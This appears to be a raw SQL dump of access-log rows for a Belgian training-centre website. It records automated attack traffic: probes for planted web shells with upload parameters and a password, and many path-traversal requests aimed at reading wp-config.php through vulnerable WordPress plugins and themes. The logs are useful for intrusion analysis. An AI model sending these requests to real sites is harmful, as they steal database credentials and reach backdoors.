(72079, 1494370441.198689, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/Fbrrchive.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72080, 1494370457.111912, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/Fbrrchive.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72081, 1494370468.422771, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/myshe.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72082, 1494370473.501938, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/myshe.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72083, 1494370481.673938, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-cache.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72084, 1494370492.861165, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-cache.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72085, 1494370508.702546, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-footers.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72086, 1494370510.537328, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-footers.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72087, 1494370516.354736, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wpfootes.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72088, 1494370519.370092, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wpfootes.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72089, 1494370525.350565, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/sql_dump.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72090, 1494370527.238618, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/sql_dump.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72091, 1494370529.699085, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/SocketIontrol.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72092, 1494370551.098001, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/SocketIontrol.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72093, 1494370568.454978, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/SocketIasrgasfontrol.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72094, 1494370573.842906, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/SocketIasrgasfontrol.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72095, 1494370579.265675, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/configurationbak.php.suspected?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72096, 1494370591.678660, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/configurationbak.php.suspected?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72097, 1494370601.433233, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/Analyser.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72098, 1494370602.793196, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/Analyser.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72099, 1494370622.343485, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/cache/list.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NhY2hlLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72100, 1494370633.480856, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/cache/list.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NhY2hlLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72101, 1494370634.959937, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/license.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H=', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(72102, 1494370643.997943, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/tmp/sfx.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H=', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(72103, 1494370645.943701, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/up.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H=', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(72104, 1494370651.518994, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/m.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H=', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(72105, 1494370660.680342, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/ny.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H=', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(72106, 1494370662.294371, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/tmp/guide.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H=', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(72107, 1494370665.282296, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/media/jss.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H=', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(72108, 1494370670.986202, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/media/css.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H=', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(72109, 1494370674.072309, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/css.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H=', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(72110, 1494370675.011648, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/nktt.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H=', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(72111, 1494370683.858892, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/zibi.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H=', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(72112, 1494370688.139028, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/u.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H=', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(72113, 1494370692.975573, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/ws0.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H=', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(72114, 1494370702.852610, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/libraries/joomla/web.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H=', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(72115, 1494370710.246089, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/active.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H=', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(72116, 1494370720.211692, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/images/stories/alfa.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H=', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(72117, 1494370729.890612, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/images/stories/s.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H=', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(72118, 1494370741.507338, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/images/stories/black.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H=', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(72119, 1494370750.085119, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/images/logo_img.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H=', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(72120, 1494370755.296011, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/images/p.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H=', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(72121, 1494370761.548956, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/help.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H=', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(72122, 1494370767.398894, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/libraries/respectMuslims.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H=', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(72123, 1494370773.126385, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/libraries/joomla/zipy.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H=', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(72124, 1494370774.866369, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/tmp/pz.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H=', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(72125, 1494370780.787664, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/go.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H=', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(72126, 1494370794.112244, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-configuration.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H=', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(72127, 1494370802.217791, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/images/stories/3xp.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H=', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(72128, 1494371169.913876, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/xup.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H=', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(72129, 1494371177.840900, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/zebda.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H=', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(72130, 1494371179.014931, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/help.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H=', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(72131, 1494371186.049793, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/kk.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H=', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(72132, 1494371190.450917, 1247482290, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp_logns.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H=', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)'),
(72133, 1494371196.483235, 3256644604, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-filemanager/incl/libfile.php?path=../../&filename=wp-config.php&action=download', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(72134, 1494371221.439129, 3256644604, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/themes/construct/lib/scripts/dl-skin.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(72135, 1494371635.047864, 876257645, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Cliqzbot/1.0; +http://cliqz.com/company/cliqzbot)'),
(72136, 1494371635.990645, 876257645, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Cliqzbot/1.0; +http://cliqz.com/company/cliqzbot)'),
(72137, 1494373191.930805, 3256644604, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/themes/fusion/lib/scripts/dl-skin.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(72138, 1494374513.812702, 676177839, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72139, 1494375923.631475, 3256644604, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/themes/infocus/lib/scripts/dl-skin.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(72140, 1494377454.227136, 3256644604, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/image-export/download.php?file=../../../wp-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(72141, 1494378987.243706, 3256644604, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(72142, 1494381972.587519, 3256644604, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/themes/dejavu/lib/scripts/dl-skin.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(72143, 1494382001.901690, 3256644604, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/lote27/download.php?download=../../../wp-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(72144, 1494383043.946210, 3256644604, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/plugins/really-simple-guest-post/simple-guest-post-submit.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(72145, 1494385108.780106, 3256644604, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/themes/elegance/lib/scripts/dl-skin.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(72146, 1494386893.491571, 3473362978, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', ''),
(72147, 1494387555.096327, 3256644604, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/themes/method/lib/scripts/dl-skin.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(72148, 1494387579.047250, 3256644604, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/?action=cpis_init&cpis-action=f-download&purchase_id=1&cpis_user_email=i0SECLABintermal.com&f=../../../../wp-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(72149, 1494388582.486810, 1123631313, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72150, 1494388582.949299, 1123631313, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72151, 1494390446.529801, 3256644604, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(72152, 1494390447.474364, 3256644604, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/estrutura-basica/scripts/download.php?arquivo=../../wp-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(72153, 1494393871.516783, 3256644604, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/document_manager/views/file_download.php?fname=../../wp-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(72154, 1494394070.072204, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(72155, 1494394070.504971, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72156, 1494394070.914611, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72157, 1494394071.353036, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72158, 1494394071.998261, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72159, 1494394072.454531, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72160, 1494394072.932512, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72161, 1494394073.458515, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(72162, 1494394073.903311, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72163, 1494394074.320284, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72164, 1494394074.744805, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72165, 1494394075.223792, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72166, 1494394075.709141, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72167, 1494394076.138106, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72168, 1494394124.500347, 3256644604, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=../../../wp-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(72169, 1494394460.618208, 2953337008, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-indeks.php', 'http://www.crosstrainingcenter.be/wp-indeks.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72170, 1494394460.623568, 2953337008, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/routing.php', 'http://www.crosstrainingcenter.be/wp-includes/routing.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72171, 1494398954.921046, 3256644604, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(72172, 1494405122.570289, 3242976508, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjIm6vy9OTTAhVEJMAKHVfSBjwQFgglMAA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(72173, 1494407032.055552, 3256644604, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
